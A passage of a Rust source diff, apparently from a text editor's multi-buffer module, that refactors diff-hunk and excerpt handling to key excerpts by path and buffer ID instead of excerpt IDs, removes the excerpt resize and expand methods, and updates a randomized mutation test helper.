+2007,33 @@ impl MultiBuffer { range: Range, cx: &mut Context, ) { - self.sync_mut(cx); + let Some(buffer) = self.buffer(diff.read(cx).buffer_id) else { + return; + }; + let snapshot = self.sync_mut(cx); let diff = diff.read(cx); let buffer_id = diff.buffer_id; - let Some(buffer_state) = self.buffers.get(&buffer_id) else { + let Some(path) = snapshot.path_for_buffer(buffer_id).cloned() else { return; }; let new_diff = DiffStateSnapshot { + buffer_id, diff: diff.snapshot(cx), main_buffer: None, }; - let mut snapshot = self.snapshot.get_mut(); - let base_text_changed = snapshot - .diffs - .get(&buffer_id) + let snapshot = self.snapshot.get_mut(); + let base_text_changed = find_diff_state(&snapshot.diffs, buffer_id) .is_none_or(|old_diff| !new_diff.base_texts_definitely_eq(old_diff)); - snapshot.diffs.insert_or_replace(buffer_id, new_diff); + snapshot.diffs.insert_or_replace(new_diff, ()); - let buffer = buffer_state.buffer.read(cx); + let buffer = buffer.read(cx); let diff_change_range = range.to_offset(buffer); - let excerpt_edits = snapshot.excerpt_edits_for_diff_change(buffer_state, diff_change_range); + let excerpt_edits = snapshot.excerpt_edits_for_diff_change(&path, diff_change_range); let edits = Self::sync_diff_transforms( - &mut snapshot, + snapshot, excerpt_edits, DiffChangeKind::DiffUpdated { base_changed: base_text_changed, @@ -2482,6 +2044,7 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2492,31 +2055,30 @@ impl MultiBuffer { diff_change_range: Option>, cx: &mut Context, ) { - self.sync_mut(cx); + let snapshot = self.sync_mut(cx); let base_text_buffer_id = diff.read(cx).base_text_buffer().read(cx).remote_id(); - let Some(buffer_state) = self.buffers.get(&base_text_buffer_id) else { + let Some(path) = snapshot.path_for_buffer(base_text_buffer_id).cloned() else { return; }; let main_buffer_snapshot = main_buffer.read(cx).snapshot(); let diff = diff.read(cx); let new_diff = DiffStateSnapshot { + buffer_id: base_text_buffer_id, diff: diff.snapshot(cx), main_buffer: Some(main_buffer_snapshot), }; - let mut snapshot = self.snapshot.get_mut(); - snapshot - .diffs - .insert_or_replace(base_text_buffer_id, new_diff); + let snapshot = self.snapshot.get_mut(); + snapshot.diffs.insert_or_replace(new_diff, ()); let Some(diff_change_range) = diff_change_range else { return; }; - let excerpt_edits = snapshot.excerpt_edits_for_diff_change(buffer_state, diff_change_range); + let excerpt_edits = snapshot.excerpt_edits_for_diff_change(&path, diff_change_range); let edits = Self::sync_diff_transforms( - &mut snapshot, + snapshot, excerpt_edits, DiffChangeKind::DiffUpdated { // We don't read this field for inverted diffs. @@ -2528,6 +2090,7 @@ impl MultiBuffer { } cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2539,14 +2102,6 @@ impl MultiBuffer { self.all_buffers_iter().collect() } - pub fn all_buffer_ids_iter(&self) -> impl Iterator { - self.buffers.keys().copied() - } - - pub fn all_buffer_ids(&self) -> Vec { - self.all_buffer_ids_iter().collect() - } - pub fn buffer(&self, buffer_id: BufferId) -> Option> { self.buffers .get(&buffer_id) @@ -2559,18 +2114,12 @@ impl MultiBuffer { } pub fn language_settings<'a>(&'a self, cx: &'a App) -> Cow<'a, LanguageSettings> { - let buffer_id = self - .snapshot - .borrow() + let snapshot = self.snapshot(cx); + snapshot .excerpts .first() - .map(|excerpt| excerpt.buffer.remote_id()); - buffer_id - .and_then(|buffer_id| self.buffer(buffer_id)) - .map(|buffer| { - let buffer = buffer.read(cx); - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) - }) + .and_then(|excerpt| self.buffer(excerpt.range.context.start.buffer_id)) + .map(|buffer| LanguageSettings::for_buffer(&buffer.read(cx), cx)) .unwrap_or_else(move || self.language_settings_at(MultiBufferOffset::default(), cx)) } @@ -2579,14 +2128,11 @@ impl MultiBuffer { point: T, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - let mut language = None; - let mut file = None; if let Some((buffer, offset)) = self.point_to_buffer_offset(point, cx) { - let buffer = buffer.read(cx); - language = buffer.language_at(offset); - file = buffer.file(); + LanguageSettings::for_buffer_at(buffer.read(cx), offset, cx) + } else { + Cow::Borrowed(&AllLanguageSettings::get_global(cx).defaults) } - language_settings(language.map(|l| l.name()), file, cx) } pub fn for_each_buffer(&self, f: &mut dyn FnMut(&Entity)) { @@ -2735,7 +2281,7 @@ impl MultiBuffer { pub fn set_all_diff_hunks_expanded(&mut self, cx: &mut Context) { self.snapshot.get_mut().all_diff_hunks_expanded = true; - self.expand_or_collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], true, cx); + self.expand_or_collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], true, cx); } pub fn all_diff_hunks_expanded(&self) -> bool { @@ -2744,7 +2290,7 @@ impl MultiBuffer { pub fn set_all_diff_hunks_collapsed(&mut self, cx: &mut Context) { self.snapshot.get_mut().all_diff_hunks_expanded = false; - self.expand_or_collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], false, cx); + self.expand_or_collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], false, cx); } pub fn set_show_deleted_hunks(&mut self, show: bool, cx: &mut Context) { @@ -2754,7 +2300,7 @@ impl MultiBuffer { let old_len = self.snapshot.borrow().len(); - let ranges = std::iter::once((Point::zero()..Point::MAX, ExcerptId::max())); + let ranges = std::iter::once((Point::zero()..Point::MAX, None)); let _ = self.expand_or_collapse_diff_hunks_inner(ranges, true, cx); let new_len = self.snapshot.borrow().len(); @@ -2767,6 +2313,7 @@ impl MultiBuffer { cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } @@ -2776,7 +2323,7 @@ impl MultiBuffer { pub fn has_multiple_hunks(&self, cx: &App) -> bool { self.read(cx) - .diff_hunks_in_range(Anchor::min()..Anchor::max()) + .diff_hunks_in_range(Anchor::Min..Anchor::Max) .nth(1) .is_some() } @@ -2822,7 +2369,7 @@ impl MultiBuffer { pub fn expand_or_collapse_diff_hunks_inner( &mut self, - ranges: impl IntoIterator, ExcerptId)>, + ranges: impl IntoIterator, Option)>, expand: bool, cx: &mut Context, ) -> Vec> { @@ -2833,18 +2380,34 @@ impl MultiBuffer { let mut snapshot = self.snapshot.get_mut(); let mut excerpt_edits = Vec::new(); let mut last_hunk_row = None; - for (range, end_excerpt_id) in ranges { + for (range, end_anchor) in ranges { for diff_hunk in snapshot.diff_hunks_in_range(range) { - if diff_hunk.excerpt_id.cmp(&end_excerpt_id, &snapshot).is_gt() { + if let Some(end_anchor) = &end_anchor + && let Some(hunk_end_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.end) + && hunk_end_anchor.cmp(end_anchor, snapshot).is_gt() + { + continue; + } + let hunk_range = diff_hunk.multi_buffer_range; + if let Some(excerpt_start_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.start) + && hunk_range.start.to_point(snapshot) < excerpt_start_anchor.to_point(snapshot) + { continue; } if last_hunk_row.is_some_and(|row| row >= diff_hunk.row_range.start) { continue; } - let start = Anchor::in_buffer(diff_hunk.excerpt_id, diff_hunk.buffer_range.start); - let end = Anchor::in_buffer(diff_hunk.excerpt_id, diff_hunk.buffer_range.end); - let start = snapshot.excerpt_offset_for_anchor(&start); - let end = snapshot.excerpt_offset_for_anchor(&end); + let mut start = snapshot.excerpt_offset_for_anchor(&hunk_range.start); + let mut end = snapshot.excerpt_offset_for_anchor(&hunk_range.end); + if let Some(excerpt_end_anchor) = + snapshot.anchor_in_excerpt(diff_hunk.excerpt_range.context.end) + { + let excerpt_end = snapshot.excerpt_offset_for_anchor(&excerpt_end_anchor); + start = start.min(excerpt_end); + end = end.min(excerpt_end); + }; last_hunk_row = Some(diff_hunk.row_range.start); excerpt_edits.push(text::Edit { old: start..end, @@ -2867,15 +2430,18 @@ impl MultiBuffer { cx: &mut Context, ) { let snapshot = self.snapshot.borrow().clone(); - let ranges = ranges.iter().map(move |range| { - let end_excerpt_id = range.end.excerpt_id; - let range = range.to_point(&snapshot); - let mut peek_end = range.end; - if range.end.row < snapshot.max_row().0 { - peek_end = Point::new(range.end.row + 1, 0); - }; - (range.start..peek_end, end_excerpt_id) - }); + let ranges = + ranges.iter().map(move |range| { + let excerpt_end = snapshot.excerpt_containing(range.end..range.end).and_then( + |(_, excerpt_range)| snapshot.anchor_in_excerpt(excerpt_range.context.end), + ); + let range = range.to_point(&snapshot); + let mut peek_end = range.end; + if range.end.row < snapshot.max_row().0 { + peek_end = Point::new(range.end.row + 1, 0); + }; + (range.start..peek_end, excerpt_end) + }); let edits = self.expand_or_collapse_diff_hunks_inner(ranges, expand, cx); if !edits.is_empty() { self.subscriptions.publish(edits); @@ -2883,185 +2449,10 @@ impl MultiBuffer { cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } - pub fn resize_excerpt( - &mut self, - id: ExcerptId, - range: Range, - cx: &mut Context, - ) { - self.sync_mut(cx); - - let mut snapshot = self.snapshot.get_mut(); - let locator = snapshot.excerpt_locator_for_id(id); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::>::new(); - - let prefix = cursor.slice(&Some(locator), Bias::Left); - new_excerpts.append(prefix, ()); - - let mut excerpt = cursor.item().unwrap().clone(); - let old_text_len = excerpt.text_summary.len; - - excerpt.range.context.start = range.start; - excerpt.range.context.end = range.end; - excerpt.max_buffer_row = range.end.to_point(&excerpt.buffer).row; - - excerpt.text_summary = excerpt - .buffer - .text_summary_for_range(excerpt.range.context.clone()); - - let new_start_offset = ExcerptDimension(new_excerpts.summary().text.len); - let old_start_offset = cursor.start().1; - let new_text_len = excerpt.text_summary.len; - let edit = Edit { - old: old_start_offset..old_start_offset + old_text_len, - new: new_start_offset..new_start_offset + new_text_len, - }; - - if let Some(last_edit) = edits.last_mut() { - if last_edit.old.end == edit.old.start { - last_edit.old.end = edit.old.end; - last_edit.new.end = edit.new.end; - } else { - edits.push(edit); - } - } else { - edits.push(edit); - } - - new_excerpts.push(excerpt, ()); - - cursor.next(); - - new_excerpts.append(cursor.suffix(), ()); - - drop(cursor); - snapshot.excerpts = new_excerpts; - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsExpanded { ids: vec![id] }); - cx.notify(); - } - - pub fn expand_excerpts( - &mut self, - ids: impl IntoIterator, - line_count: u32, - direction: ExpandExcerptDirection, - cx: &mut Context, - ) { - if line_count == 0 { - return; - } - self.sync_mut(cx); - if !self.excerpts_by_path.is_empty() { - self.expand_excerpts_with_paths(ids, line_count, direction, cx); - return; - } - let mut snapshot = self.snapshot.get_mut(); - - let ids = ids.into_iter().collect::>(); - let locators = snapshot.excerpt_locators_for_ids(ids.iter().copied()); - let mut new_excerpts = SumTree::default(); - let mut cursor = snapshot - .excerpts - .cursor::, ExcerptOffset>>(()); - let mut edits = Vec::>::new(); - - for locator in &locators { - let prefix = cursor.slice(&Some(locator), Bias::Left); - new_excerpts.append(prefix, ()); - - let mut excerpt = cursor.item().unwrap().clone(); - let old_text_len = excerpt.text_summary.len; - - let up_line_count = if direction.should_expand_up() { - line_count - } else { - 0 - }; - - let start_row = excerpt - .range - .context - .start - .to_point(&excerpt.buffer) - .row - .saturating_sub(up_line_count); - let start_point = Point::new(start_row, 0); - excerpt.range.context.start = excerpt.buffer.anchor_before(start_point); - - let down_line_count = if direction.should_expand_down() { - line_count - } else { - 0 - }; - - let mut end_point = excerpt.buffer.clip_point( - excerpt.range.context.end.to_point(&excerpt.buffer) - + Point::new(down_line_count, 0), - Bias::Left, - ); - end_point.column = excerpt.buffer.line_len(end_point.row); - excerpt.range.context.end = excerpt.buffer.anchor_after(end_point); - excerpt.max_buffer_row = end_point.row; - - excerpt.text_summary = excerpt - .buffer - .text_summary_for_range(excerpt.range.context.clone()); - - let new_start_offset = ExcerptDimension(new_excerpts.summary().text.len); - let old_start_offset = cursor.start().1; - let new_text_len = excerpt.text_summary.len; - let edit = Edit { - old: old_start_offset..old_start_offset + old_text_len, - new: new_start_offset..new_start_offset + new_text_len, - }; - - if let Some(last_edit) = edits.last_mut() { - if last_edit.old.end == edit.old.start { - last_edit.old.end = edit.old.end; - last_edit.new.end = edit.new.end; - } else { - edits.push(edit); - } - } else { - edits.push(edit); - } - - new_excerpts.push(excerpt, ()); - - cursor.next(); - } - - new_excerpts.append(cursor.suffix(), ()); - - drop(cursor); - snapshot.excerpts = new_excerpts; - - let edits = Self::sync_diff_transforms(&mut snapshot, edits, DiffChangeKind::BufferEdited); - if !edits.is_empty() { - self.subscriptions.publish(edits); - } - cx.emit(Event::Edited { - edited_buffer: None, - }); - cx.emit(Event::ExcerptsExpanded { ids }); - cx.notify(); - } - #[ztracing::instrument(skip_all)] fn sync(&self, cx: &App) { let changed = self.buffer_changed_since_sync.replace(false); @@ -3079,17 +2470,19 @@ impl MultiBuffer { } } - fn sync_mut(&mut self, cx: &App) { + fn sync_mut(&mut self, cx: &App) -> &mut MultiBufferSnapshot { + let snapshot = self.snapshot.get_mut(); let changed = self.buffer_changed_since_sync.replace(false); if !changed { - return; + return snapshot; } - let edits = - Self::sync_from_buffer_changes(self.snapshot.get_mut(), &self.buffers, &self.diffs, cx); + let edits = Self::sync_from_buffer_changes(snapshot, &self.buffers, &self.diffs, cx); if !edits.is_empty() { self.subscriptions.publish(edits); } + + snapshot } fn sync_from_buffer_changes( @@ -3100,8 +2493,10 @@ impl MultiBuffer { ) -> Vec> { let MultiBufferSnapshot { excerpts, - buffer_locators: _, diffs: buffer_diff, + buffers: buffer_snapshots, + path_keys_by_index: _, + indices_by_path_key: _, diff_transforms: _, non_text_state_update_count, edit_count, @@ -3110,8 +2505,6 @@ impl MultiBuffer { has_conflict, has_inverted_diff: _, singleton: _, - excerpt_ids: _, - replaced_excerpts: _, trailing_excerpt_update_count: _, all_diff_hunks_expanded: _, show_deleted_hunks: _, @@ -3125,11 +2518,7 @@ impl MultiBuffer { if !diffs.is_empty() { let mut diffs_to_add = Vec::new(); for (id, diff) in diffs { - // For inverted diffs, we excerpt the diff base texts in the multibuffer - // and use the diff hunk base text ranges to compute diff transforms. - // Those base text ranges are usize, so make sure if the base text changed - // we also update the diff snapshot so that we don't use stale offsets - if buffer_diff.get(id).is_none_or(|existing_diff| { + if find_diff_state(buffer_diff, *id).is_none_or(|existing_diff| { if existing_diff.main_buffer.is_none() { return false; } @@ -3140,38 +2529,40 @@ impl MultiBuffer { .changed_since(existing_diff.base_text().version()) }) { if diffs_to_add.capacity() == 0 { - // we'd rather overallocate than reallocate as buffer diffs are quite big - // meaning re-allocations will be fairly expensive diffs_to_add.reserve(diffs.len()); } - diffs_to_add.push((*id, diff.snapshot(cx))); + diffs_to_add.push(sum_tree::Edit::Insert(diff.snapshot(*id, cx))); } } - buffer_diff.extend(diffs_to_add); + buffer_diff.edit(diffs_to_add, ()); } - let mut excerpts_to_edit = Vec::new(); + let mut paths_to_edit = Vec::new(); let mut non_text_state_updated = false; let mut edited = false; for buffer_state in buffers.values() { let buffer = buffer_state.buffer.read(cx); - let version = buffer.version(); + let last_snapshot = buffer_snapshots + .get(&buffer.remote_id()) + .expect("each buffer should have a snapshot"); + let current_version = buffer.version(); let non_text_state_update_count = buffer.non_text_state_update_count(); - let buffer_edited = version.changed_since(&buffer_state.last_version.borrow()); - let buffer_non_text_state_updated = - non_text_state_update_count > buffer_state.last_non_text_state_update_count.get(); + let buffer_edited = + current_version.changed_since(last_snapshot.buffer_snapshot.version()); + let buffer_non_text_state_updated = non_text_state_update_count + > last_snapshot.buffer_snapshot.non_text_state_update_count(); if buffer_edited || buffer_non_text_state_updated { - *buffer_state.last_version.borrow_mut() = version; - buffer_state - .last_non_text_state_update_count - .set(non_text_state_update_count); - excerpts_to_edit.extend( - buffer_state - .excerpts - .iter() - .map(|locator| (locator, buffer_state.buffer.clone(), buffer_edited)), - ); + paths_to_edit.push(( + last_snapshot.path_key.clone(), + last_snapshot.path_key_index, + buffer_state.buffer.clone(), + if buffer_edited { + Some(last_snapshot.buffer_snapshot.version().clone()) + } else { + None + }, + )); } edited |= buffer_edited; @@ -3189,55 +2580,64 @@ impl MultiBuffer { *non_text_state_update_count += 1; } - excerpts_to_edit.sort_unstable_by_key(|&(locator, _, _)| locator); + paths_to_edit.sort_unstable_by_key(|(path, _, _, _)| path.clone()); let mut edits = Vec::new(); let mut new_excerpts = SumTree::default(); - let mut cursor = excerpts.cursor::, ExcerptOffset>>(()); + let mut cursor = excerpts.cursor::(()); - for (locator, buffer, buffer_edited) in excerpts_to_edit { - new_excerpts.append(cursor.slice(&Some(locator), Bias::Left), ()); - let old_excerpt = cursor.item().unwrap(); + for (path, path_key_index, buffer, prev_version) in paths_to_edit { + new_excerpts.append(cursor.slice(&path, Bias::Left), ()); let buffer = buffer.read(cx); let buffer_id = buffer.remote_id(); - let mut new_excerpt; - if buffer_edited { - edits.extend( - buffer - .edits_since_in_range::( - old_excerpt.buffer.version(), - old_excerpt.range.context.clone(), - ) - .map(|edit| { - let excerpt_old_start = cursor.start().1; - let excerpt_new_start = - ExcerptDimension(new_excerpts.summary().text.len); - let old_start = excerpt_old_start + edit.old.start; - let old_end = excerpt_old_start + edit.old.end; - let new_start = excerpt_new_start + edit.new.start; - let new_end = excerpt_new_start + edit.new.end; - Edit { - old: old_start..old_end, - new: new_start..new_end, - } - }), - ); - new_excerpt = Excerpt::new( - old_excerpt.id, - locator.clone(), - buffer_id, - Arc::new(buffer.snapshot()), - old_excerpt.range.clone(), - old_excerpt.has_trailing_newline, - ); - } else { - new_excerpt = old_excerpt.clone(); - new_excerpt.buffer = Arc::new(buffer.snapshot()); - } + buffer_snapshots.insert( + buffer_id, + BufferStateSnapshot { + path_key: path.clone(), + path_key_index, + buffer_snapshot: buffer.snapshot(), + }, + ); - new_excerpts.push(new_excerpt, ()); - cursor.next(); + if let Some(prev_version) = &prev_version { + while let Some(old_excerpt) = cursor.item() + && &old_excerpt.path_key == &path + { + edits.extend( + buffer + .edits_since_in_range::( + prev_version, + old_excerpt.range.context.clone(), + ) + .map(|edit| { + let excerpt_old_start = cursor.start().len(); + let excerpt_new_start = + ExcerptDimension(new_excerpts.summary().text.len); + let old_start = excerpt_old_start + edit.old.start; + let old_end = excerpt_old_start + edit.old.end; + let new_start = excerpt_new_start + edit.new.start; + let new_end = excerpt_new_start + edit.new.end; + Edit { + old: old_start..old_end, + new: new_start..new_end, + } + }), + ); + + let excerpt = Excerpt::new( + old_excerpt.path_key.clone(), + old_excerpt.path_key_index, + &buffer.snapshot(), + old_excerpt.range.clone(), + old_excerpt.has_trailing_newline, + ); + new_excerpts.push(excerpt, ()); + cursor.next(); + } + } else { + new_excerpts.append(cursor.slice(&path, Bias::Right), ()); + }; } new_excerpts.append(cursor.suffix(), ()); @@ -3334,12 +2734,13 @@ impl MultiBuffer { inserted_hunk_info: Some(hunk), .. }) => excerpts.item().is_some_and(|excerpt| { - if let Some(diff) = snapshot.diffs.get(&excerpt.buffer_id) + if let Some(diff) = find_diff_state(&snapshot.diffs, excerpt.buffer_id) && diff.main_buffer.is_some() { return true; } - hunk.hunk_start_anchor.is_valid(&excerpt.buffer) + hunk.hunk_start_anchor + .is_valid(&excerpt.buffer_snapshot(&snapshot)) }), _ => true, }; @@ -3435,11 +2836,11 @@ impl MultiBuffer { while let Some(excerpt) = excerpts.item() { // Recompute the expanded hunks in the portion of the excerpt that // intersects the edit. - if let Some(diff) = snapshot.diffs.get(&excerpt.buffer_id) { - let buffer = &excerpt.buffer; + if let Some(diff) = find_diff_state(&snapshot.diffs, excerpt.buffer_id) { + let buffer_snapshot = &excerpt.buffer_snapshot(&snapshot); let excerpt_start = *excerpts.start(); let excerpt_end = excerpt_start + excerpt.text_summary.len; - let excerpt_buffer_start = excerpt.range.context.start.to_offset(buffer); + let excerpt_buffer_start = excerpt.range.context.start.to_offset(buffer_snapshot); let excerpt_buffer_end = excerpt_buffer_start + excerpt.text_summary.len; let edit_buffer_start = excerpt_buffer_start + edit.new.start.saturating_sub(excerpt_start); @@ -3458,7 +2859,6 @@ impl MultiBuffer { log::trace!("skipping hunk that starts before excerpt"); continue; } - hunk_buffer_range.end.to_point(&excerpt.buffer); let hunk_excerpt_start = excerpt_start + hunk_buffer_range.start.saturating_sub(excerpt_buffer_start); let hunk_excerpt_end = excerpt_end @@ -3471,9 +2871,10 @@ impl MultiBuffer { ); if !hunk_buffer_range.is_empty() { let hunk_info = DiffTransformHunkInfo { - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), hunk_start_anchor: hunk.buffer_range.start, hunk_secondary_status: hunk.secondary_status, + excerpt_end: excerpt.end_anchor(), is_logically_deleted: true, }; *end_of_current_insert = @@ -3481,23 +2882,24 @@ impl MultiBuffer { } } } else { - let edit_anchor_range = buffer.anchor_before(edit_buffer_start) - ..buffer.anchor_after(edit_buffer_end); - for hunk in diff.hunks_intersecting_range(edit_anchor_range, buffer) { + let edit_anchor_range = buffer_snapshot.anchor_before(edit_buffer_start) + ..buffer_snapshot.anchor_after(edit_buffer_end); + for hunk in diff.hunks_intersecting_range(edit_anchor_range, buffer_snapshot) { if hunk.is_created_file() && !all_diff_hunks_expanded { continue; } - let hunk_buffer_range = hunk.buffer_range.to_offset(buffer); + let hunk_buffer_range = hunk.buffer_range.to_offset(buffer_snapshot); if hunk_buffer_range.start < excerpt_buffer_start { log::trace!("skipping hunk that starts before excerpt"); continue; } let hunk_info = DiffTransformHunkInfo { - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), hunk_start_anchor: hunk.buffer_range.start, hunk_secondary_status: hunk.secondary_status, + excerpt_end: excerpt.end_anchor(), is_logically_deleted: false, }; @@ -3522,7 +2924,7 @@ impl MultiBuffer { } DiffChangeKind::ExpandOrCollapseHunks { expand } => { let intersects = hunk_buffer_range.is_empty() - || hunk_buffer_range.end > edit_buffer_start; + || (hunk_buffer_range.end > edit_buffer_start); if *expand { intersects || was_previously_expanded || all_diff_hunks_expanded } else { @@ -3536,9 +2938,8 @@ impl MultiBuffer { if should_expand_hunk { did_expand_hunks = true; log::trace!( - "expanding hunk {:?}, excerpt:{:?}", + "expanding hunk {:?}", hunk_excerpt_start..hunk_excerpt_end, - excerpt.id ); if !hunk.diff_base_byte_range.is_empty() @@ -3562,7 +2963,7 @@ impl MultiBuffer { DiffTransform::DeletedHunk { base_text_byte_range: hunk.diff_base_byte_range.clone(), summary: base_text_summary, - buffer_id: excerpt.buffer_id, + buffer_id: buffer_snapshot.remote_id(), hunk_info, has_trailing_newline, }, @@ -3689,17 +3090,20 @@ impl MultiBuffer { pub fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { let snapshot = self.snapshot(cx); - let excerpt_id = range.end.excerpt_id; + let excerpt_end = snapshot + .excerpt_containing(range.end..range.end) + .and_then(|(_, excerpt_range)| snapshot.anchor_in_excerpt(excerpt_range.context.end)); let point_range = range.to_point(&snapshot); let expand = !self.single_hunk_is_expanded(range, cx); let edits = - self.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); + self.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_end)], expand, cx); if !edits.is_empty() { self.subscriptions.publish(edits); } cx.emit(Event::DiffHunksToggled); cx.emit(Event::Edited { edited_buffer: None, + is_local: true, }); } } @@ -3818,38 +3222,15 @@ impl MultiBuffer { use std::env; use util::RandomCharIter; - let max_excerpts = env::var("MAX_EXCERPTS") + let max_buffers = env::var("MAX_BUFFERS") .map(|i| i.parse().expect("invalid `MAX_EXCERPTS` variable")) .unwrap_or(5); let mut buffers = Vec::new(); for _ in 0..mutation_count { - if rng.random_bool(0.05) { - log::info!("Clearing multi-buffer"); - self.clear(cx); - continue; - } else if rng.random_bool(0.1) && !self.excerpt_ids().is_empty() { - let ids = self.excerpt_ids(); - let mut excerpts = HashSet::default(); - for _ in 0..rng.random_range(0..ids.len()) { - excerpts.extend(ids.choose(rng).copied()); - } - - let line_count = rng.random_range(0..5); - - log::info!("Expanding excerpts {excerpts:?} by {line_count} lines"); - - self.expand_excerpts( - excerpts.iter().cloned(), - line_count, - ExpandExcerptDirection::UpAndDown, - cx, - ); - continue; - } - - let excerpt_ids = self.excerpt_ids(); - if excerpt_ids.is_empty() || (rng.random() && excerpt_ids.len() < max_excerpts) { + let snapshot = self.snapshot(cx); + let buffer_ids = snapshot.all_buffer_ids().collect::>(); + if buffer_ids.is_empty() || (rng.random() && buffer_ids.len() < max_buffers) { let buffer_handle = if rng.random() || self.buffers.is_empty() { let text = RandomCharIter::new(&mut *rng).take(10).collect::(); buffers.push(cx.new(|cx| Buffer::local(text, cx))); @@ -3866,12 +3247,21 @@ impl MultiBuffer { let buffer = buffer_handle.read(cx); let buffer_text = buffer.text(); + let buffer_snapshot = buffer.snapshot(); + let mut next_min_start_ix = 0; let ranges = (0..rng.random_range(0..5)) - .map(|_| { - let end_ix = - buffer.clip_offset(rng.random_range(0..=buffer.len()), Bias::Right); - let start_ix = buffer.clip_offset(rng.random_range(0..=end_ix), Bias::Left); - ExcerptRange::new(start_ix..end_ix) + .filter_map(|_| { + if next_min_start_ix >= buffer.len() { + return None; + } + let end_ix = buffer.clip_offset( + rng.random_range(next_min_start_ix..=buffer.len()), + Bias::Right, + ); + let start_ix = buffer + .clip_offset(rng.random_range(next_min_start_ix..=end_ix), Bias::Left); + next_min_start_ix = buffer.text().ceil_char_boundary(end_ix + 1); + Some(ExcerptRange::new(start_ix..end_ix)) }) .collect::>(); log::info!( @@ -3884,20 +3274,26 @@ impl MultiBuffer { .collect::>() ); - let excerpt_id = - self.insert_excerpts_after(ExcerptId::max(), buffer_handle, ranges, cx); - log::info!("Inserted with ids: {:?}", excerpt_id); + let path_key = PathKey::for_buffer(&buffer_handle, cx); + self.set_merged_excerpt_ranges_for_path( + path_key.clone(), + buffer_handle, + &buffer_snapshot, + ranges, + cx, + ); + log::info!("Inserted with path_key: {:?}", path_key); } else { - let remove_count = rng.random_range(1..=excerpt_ids.len()); - let mut excerpts_to_remove = excerpt_ids - .choose_multiple(rng, remove_count) - .cloned() - .collect::>(); - let snapshot = self.snapshot.borrow(); - excerpts_to_remove.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - drop(snapshot); - log::info!("Removing excerpts {:?}", excerpts_to_remove); - self.remove_excerpts(excerpts_to_remove, cx); + let path_key = self + .snapshot + .borrow() + .buffers + .get(&buffer_ids.choose(rng).unwrap()) + .unwrap() + .path_key + .clone(); + log::info!("Removing excerpts {:?}", path_key); + self.remove_excerpts(path_key, cx); } } } @@ -4005,7 +3401,7 @@ impl MultiBufferSnapshot { } pub fn diff_hunks(&self) -> impl Iterator + '_ { - self.diff_hunks_in_range(Anchor::min()..Anchor::max()) + self.diff_hunks_in_range(Anchor::Min..Anchor::Max) } pub fn diff_hunks_in_range( @@ -4014,7 +3410,7 @@ impl MultiBufferSnapshot { ) -> impl Iterator + '_ { let query_range = range.start.to_point(self)..range.end.to_point(self); self.lift_buffer_metadata(query_range.clone(), move |buffer, buffer_range| { - let diff = self.diffs.get(&buffer.remote_id())?; + let diff = self.diff_state(buffer.remote_id())?; let iter = if let Some(main_buffer) = &diff.main_buffer { let buffer_start = buffer.point_to_offset(buffer_range.start); let buffer_end = buffer.point_to_offset(buffer_range.end); @@ -4043,6 +3439,7 @@ impl MultiBufferSnapshot { })) }) .filter_map(move |(range, (hunk, is_inverted), excerpt)| { + let buffer_snapshot = excerpt.buffer_snapshot(self); if range.start != range.end && range.end == query_range.start && !hunk.range.is_empty() { return None; @@ -4061,12 +3458,12 @@ impl MultiBufferSnapshot { if self.show_deleted_hunks || is_inverted { let hunk_start_offset = if is_inverted { Anchor::in_buffer( - excerpt.id, - excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start), + excerpt.path_key_index, + buffer_snapshot.anchor_after(hunk.diff_base_byte_range.start), ) .to_offset(self) } else { - Anchor::in_buffer(excerpt.id, hunk.buffer_range.start) + Anchor::in_buffer(excerpt.path_key_index, hunk.buffer_range.start) .to_offset(self) }; @@ -4077,7 +3474,8 @@ impl MultiBufferSnapshot { if !is_inverted { word_diffs.extend(hunk.buffer_word_diffs.into_iter().map(|diff| { - Anchor::range_in_buffer(excerpt.id, diff).to_offset(self) + Anchor::range_in_buffer(excerpt.path_key_index, diff) + .to_offset(self) })); } word_diffs @@ -4085,8 +3483,8 @@ impl MultiBufferSnapshot { .unwrap_or_default(); let buffer_range = if is_inverted { - excerpt.buffer.anchor_after(hunk.diff_base_byte_range.start) - ..excerpt.buffer.anchor_before(hunk.diff_base_byte_range.end) + buffer_snapshot.anchor_after(hunk.diff_base_byte_range.start) + ..buffer_snapshot.anchor_before(hunk.diff_base_byte_range.end) } else { hunk.buffer_range.clone() }; @@ -4097,10 +3495,11 @@ impl MultiBufferSnapshot { } else { DiffHunkStatusKind::Modified }; + let multi_buffer_range = + Anchor::range_in_buffer(excerpt.path_key_index, buffer_range.clone()); Some(MultiBufferDiffHunk { row_range: MultiBufferRow(range.start.row)..MultiBufferRow(end_row), - buffer_id: excerpt.buffer_id, - excerpt_id: excerpt.id, + buffer_id: buffer_snapshot.remote_id(), buffer_range, word_diffs, diff_base_byte_range: BufferOffset(hunk.diff_base_byte_range.start) @@ -4109,6 +3508,8 @@ impl MultiBufferSnapshot { kind: status_kind, secondary: hunk.secondary_status, }, + excerpt_range: excerpt.range.clone(), + multi_buffer_range, }) }) } @@ -4133,19 +3534,12 @@ impl MultiBufferSnapshot { }) } - pub fn excerpt_ids_for_range( + 